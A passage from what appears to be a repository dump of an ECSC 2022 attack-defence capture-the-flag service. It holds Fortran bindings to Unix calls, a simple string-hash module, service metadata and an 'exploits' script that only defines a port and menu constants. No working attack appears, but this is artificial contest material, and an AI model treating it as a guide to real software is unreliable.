Other stuff 9 | *.swp 10 | *.mod 11 | *.o 12 | *.a 13 | *.so 14 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/src/deps/fortran-unix/LICENCE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2020, Philipp Engel 2 | 3 | Permission to use, copy, modify, and/or distribute this software for any purpose 4 | with or without fee is hereby granted, provided that the above copyright notice 5 | and this permission notice appear in all copies. 6 | 7 | THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH 8 | REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND 9 | FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, 10 | INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS 11 | OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER 12 | TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF 13 | THIS SOFTWARE. 14 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/src/deps/fortran-unix/examples/pid/pid.f90: -------------------------------------------------------------------------------- 1 | ! pid.f90 2 | ! 3 | ! Example program that outputs the process id. 4 | ! 5 | ! Author: Philipp Engel 6 | ! Licence: ISC 7 | program main 8 | use, intrinsic :: iso_c_binding 9 | use :: unix 10 | implicit none 11 | 12 | print '("PID: ", i0)', c_getpid() 13 | end program main 14 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/src/deps/fortran-unix/examples/signal/signal.f90: -------------------------------------------------------------------------------- 1 | ! signal.f90 2 | ! 3 | ! Example program that registers a signal handler for SIGINT. 4 | ! 5 | ! Author: Philipp Engel 6 | ! 
Licence: ISC 7 | program main 8 | use, intrinsic :: iso_c_binding 9 | use :: unix 10 | implicit none 11 | integer :: rc 12 | type(c_funptr) :: ptr 13 | 14 | ! Register signal handler. 15 | ptr = c_signal(SIGINT, c_funloc(sigint_handler)) 16 | 17 | print '(a)', 'Press CTRL + C to send SIGINT.' 18 | 19 | do 20 | print '(a)', 'zzz ...' 21 | rc = c_usleep(10**6) 22 | end do 23 | contains 24 | subroutine sigint_handler(signum) bind(c) 25 | !! Signal handler for SIGINT. 26 | integer(kind=c_int), intent(in), value :: signum 27 | 28 | print '(a, i0, a)', 'Received SIGINT (', signum, '). Terminating ...' 29 | stop 30 | end subroutine sigint_handler 31 | end program main 32 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/src/deps/fortran-unix/src/unix_ioctl.F90: -------------------------------------------------------------------------------- 1 | ! unix_ioctl.F90 2 | module unix_ioctl 3 | use, intrinsic :: iso_c_binding 4 | implicit none 5 | private 6 | 7 | public :: c_ioctl 8 | 9 | interface 10 | ! int ioctl(int fd, int cmd, int arg) 11 | function c_ioctl(fd, request, arg) bind(c, name='ioctl') 12 | import :: c_int, c_ptr 13 | implicit none 14 | integer(kind=c_int), intent(in), value :: fd 15 | integer(kind=c_int), intent(in), value :: request 16 | type(c_ptr), intent(in), value :: arg 17 | integer(kind=c_int) :: c_ioctl 18 | end function c_ioctl 19 | end interface 20 | end module unix_ioctl 21 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/src/deps/fortran-unix/src/unix_macro.c: -------------------------------------------------------------------------------- 1 | /* unix_macro.c */ 2 | #include 3 | 4 | /* Returns variable `errno` from `errno.h`. 
*/ 5 | int error_number() 6 | { 7 | return errno; 8 | } 9 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/src/deps/fortran-unix/src/unix_stdlib.F90: -------------------------------------------------------------------------------- 1 | ! unix_stdlib.F90 2 | module unix_stdlib 3 | use, intrinsic :: iso_c_binding 4 | implicit none 5 | private 6 | 7 | public :: c_exit 8 | public :: c_free 9 | 10 | interface 11 | ! void exit(int status) 12 | subroutine c_exit(status) bind(c, name='exit') 13 | import :: c_int 14 | implicit none 15 | integer(kind=c_int), intent(in), value :: status 16 | end subroutine c_exit 17 | 18 | ! void free(void *ptr) 19 | subroutine c_free(ptr) bind(c, name='free') 20 | import :: c_ptr 21 | implicit none 22 | type(c_ptr), intent(in), value :: ptr 23 | end subroutine c_free 24 | end interface 25 | end module unix_stdlib 26 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/src/deps/fortran-unix/src/unix_wait.F90: -------------------------------------------------------------------------------- 1 | ! unix_wait.F90 2 | module unix_wait 3 | use, intrinsic :: iso_c_binding 4 | use :: unix_types 5 | implicit none 6 | private 7 | 8 | public :: c_wait 9 | 10 | interface 11 | ! 
pid_t wait(int *stat_loc) 12 | function c_wait(stat_loc) bind(c, name='wait') 13 | import :: c_int, c_pid_t 14 | implicit none 15 | integer(kind=c_int), intent(out) :: stat_loc 16 | integer(kind=c_pid_t) :: c_wait 17 | end function c_wait 18 | end interface 19 | end module unix_wait 20 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/src/mod_bucket.f: -------------------------------------------------------------------------------- 1 | MODULE mod_bucket 2 | CONTAINS 3 | 4 | FUNCTION calculate_bucket(str, num_buckets) 5 | INTEGER :: calculate_bucket 6 | INTEGER :: i, bucket 7 | CHARACTER(len=*),INTENT(IN) :: str 8 | INTEGER,INTENT(IN) :: num_buckets 9 | 10 | bucket = 0 11 | DO i = 1, LEN(str) 12 | bucket = bucket + ICHAR(str(i:i)) 13 | END DO 14 | calculate_bucket = MOD(bucket, num_buckets) 15 | 16 | RETURN 17 | END FUNCTION calculate_bucket 18 | END MODULE mod_bucket 19 | -------------------------------------------------------------------------------- /winds-of-the-past/exploits/winds_of_the_past.py: -------------------------------------------------------------------------------- 1 | import enum 2 | 3 | 4 | NUM_MODELNUMBERS = 5 5 | PORT = 10060 6 | 7 | 8 | class Menu(enum.Enum): 9 | EXIT = b"0" 10 | REGISTER_USER = b"1" 11 | LOGIN = b"2" 12 | SHOW_USER_DETAILS = b"3" 13 | SHOW_TURBINE_DETAILS = b"4" 14 | REGISTER_TURBINE = b"5" 15 | CALCULATE_CAPACITY = b"6" 16 | 17 | MENU_START = b"0. 
Exit" 18 | MENU_END = b"Select an option: " 19 | -------------------------------------------------------------------------------- /winds-of-the-past/meta.env: -------------------------------------------------------------------------------- 1 | SERVICE_NAME=winds-of-the-past 2 | PROTECTED_FILES=**/CMakeLists.txt;**/Makefile;cleanup-cron;run.sh 3 | -------------------------------------------------------------------------------- /winds-of-the-past/winds_of_the_past.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/winds-of-the-past/winds_of_the_past.png --------------------------------------------------------------------------------